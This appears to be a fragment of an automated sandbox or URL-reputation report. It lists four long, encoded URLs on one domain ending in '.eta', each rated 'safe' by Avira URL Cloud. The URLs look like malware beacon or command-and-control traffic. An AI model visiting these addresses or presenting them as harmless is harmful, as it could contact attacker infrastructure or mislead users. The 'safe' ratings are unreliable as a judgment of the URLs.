https://berukoneru.website/tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta true
  • Avira URL Cloud: safe
 unknown
https://berukoneru.website/tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta true
  • Avira URL Cloud: safe
 unknown
https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta true
  • Avira URL Cloud: safe
 unknown
https://berukoneru.website/tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta true
  • Avira URL Cloud: safe
 unknown